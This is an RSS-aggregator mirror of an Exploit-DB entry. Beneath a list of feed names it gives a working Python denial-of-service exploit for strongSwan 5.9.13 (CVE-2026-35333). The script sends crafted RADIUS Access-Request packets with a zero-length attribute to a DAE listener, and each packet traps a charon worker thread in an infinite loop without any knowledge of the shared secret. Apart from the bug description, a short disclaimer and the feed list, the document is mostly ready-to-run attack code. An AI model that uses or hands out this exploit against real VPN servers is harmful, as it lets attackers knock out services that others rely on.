惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threat Research - Cisco Blogs
博客园 - 聂微东
小众软件
小众软件
P
Proofpoint News Feed
Security Archives - TechRepublic
Security Archives - TechRepublic
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
TaoSecurity Blog
TaoSecurity Blog
博客园 - 司徒正美
罗磊的独立博客
N
News and Events Feed by Topic
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
S
Security Affairs
S
Security @ Cisco Blogs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
The GitHub Blog
The GitHub Blog
月光博客
月光博客
S
Secure Thoughts
P
Proofpoint News Feed
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Forbes - Security
Forbes - Security
H
Heimdal Security Blog
W
WeLiveSecurity
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
L
LangChain Blog
T
The Blog of Author Tim Ferriss
NISL@THU
NISL@THU
Google DeepMind News
Google DeepMind News
Cloudbric
Cloudbric
H
Hacker News: Front Page
The Last Watchdog
The Last Watchdog
Hacker News - Newest:
Hacker News - Newest: "LLM"
C
Cisco Blogs
博客园 - 三生石上(FineUI控件)
博客园_首页
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
S
Schneier on Security
Project Zero
Project Zero
SecWiki News
SecWiki News
爱范儿
爱范儿
The Register - Security
The Register - Security
AI
AI
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Y
Y Combinator Blog
L
Lohrmann on Cybersecurity
Application and Cybersecurity Blog
Application and Cybersecurity Blog
P
Privacy International News Feed
J
Java Code Geeks
S
Securelist
C
Cyber Attacks, Cyber Crime and Cyber Security
V
Visual Studio Blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Lukas Johannes Moeller · 2026-05-29 · via Exploit-DB.com RSS Feed
# Exploit Title: strongSwan 5.9.13 - DoS
# Date: 2026-05-13
# Exploit Author: Lukas Johannes Moeller
# Vendor Homepage: https://www.strongswan.org/
# Software Link: https://download.strongswan.org/strongswan-5.9.13.tar.bz2
# Version: strongSwan <= 5.9.13 (eap-radius plugin built with DAE enabled)
# Tested on: Debian 12 bookworm, charon 5.9.13 built from upstream tarball,
#            strongswan.conf charon.plugins.eap-radius.dae.enable = yes,
#            listener bound on UDP/3799
# CVE: CVE-2026-35333
# References:
#   https://github.com/strongswan/strongswan/commit/e067d24293
#   https://nvd.nist.gov/vuln/detail/CVE-2026-35333
#   https://github.com/JohannesLks/CVE-2026-35333
#
# Description:
#   attribute_enumerate() in src/libradius/radius_message.c walks the
#   attribute list of a RADIUS message without rejecting an attribute
#   whose length byte is 0. For length == 0, this->next never advances
#   and the per-attribute length computation `this->next->length -
#   sizeof(rattr_t)` underflows to (size_t)-2. The result is an
#   infinite loop pegging one charon worker thread at 100% CPU.
#
#   The reachability detail that turns this into a pre-auth bug:
#   radius_message_t::verify() uses the SAME broken iterator to find
#   Message-Authenticator BEFORE the Response-Authenticator MD5 check
#   is applied. For RADIUS code 1 (Access-Request) verify() skips the
#   MD5 check entirely. So a malformed Access-Request with a single
#   zero-length attribute as its first attribute traps the worker
#   thread without any knowledge of the DAE shared secret.
#
#   N packets exhaust N worker threads -> full DAE denial of service.
#
# Usage:
#   python3 strongswan-5.9.13-radius-dae-dos.py --target 10.0.0.1
#   python3 strongswan-5.9.13-radius-dae-dos.py --target 10.0.0.1 --count 8
#
# Observe on the target:
#   ps -L -p $(pidof charon) -o tid,pcpu,stat,wchan:25,cmd
#   -> one or more threads in state R at ~100% CPU, never returning.
#
# Disclaimer:
#   For authorized testing and defensive research only. Do not use
#   against systems you do not own or have explicit permission to test.

import argparse
import os
import socket
import struct
import sys
import time

ACCESS_REQUEST = 1
RAT_USER_NAME  = 1


def build_zero_length_attr_packet() -> bytes:
    identifier    = os.urandom(1)[0]
    authenticator = os.urandom(16)

    # 20-byte RADIUS header + 2-byte attribute (type=User-Name, length=0)
    total_len = 22
    header = struct.pack("!BBH16s",
                         ACCESS_REQUEST,
                         identifier,
                         total_len,
                         authenticator)
    attribute = struct.pack("!BB", RAT_USER_NAME, 0)
    return header + attribute


def send_packet(packet: bytes, target: str, port: int, wait: float) -> None:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(wait)
    sock.sendto(packet, (target, port))
    print(f"[+] sent {len(packet)} bytes to {target}:{port}/udp")
    try:
        data, addr = sock.recvfrom(4096)
        print(f"[-] unexpected response {len(data)} bytes from {addr}:"
              f" {data[:32].hex()}")
    except socket.timeout:
        print(f"[+] no response within {wait:.1f}s -- expected for hung worker")
    finally:
        sock.close()


def main() -> int:
    p = argparse.ArgumentParser(
        description="CVE-2026-35333 strongSwan RADIUS DAE pre-auth DoS"
    )
    p.add_argument("--target", required=True,
                   help="DAE listener IPv4 address (e.g. 10.0.0.1)")
    p.add_argument("--port", type=int, default=3799,
                   help="DAE listener UDP port (default: 3799)")
    p.add_argument("--count", type=int, default=1,
                   help="Number of crafted packets to send (default: 1)")
    p.add_argument("--wait", type=float, default=2.0,
                   help="Per-packet response timeout in seconds (default: 2.0)")
    args = p.parse_args()

    payload = build_zero_length_attr_packet()
    for i in range(args.count):
        print(f"\n[*] crafted packet #{i + 1}: Access-Request with "
              "zero-length User-Name attribute")
        send_packet(payload, args.target, args.port, args.wait)
        time.sleep(0.2)

    print("\n[+] done; expected effect: one charon worker thread per packet "
          "stuck at 100% CPU.")
    print("    Verify on the target with:  ps -L -p $(pidof charon) "
          "-o tid,pcpu,stat,wchan:25,cmd")
    return 0


if __name__ == "__main__":
    sys.exit(main())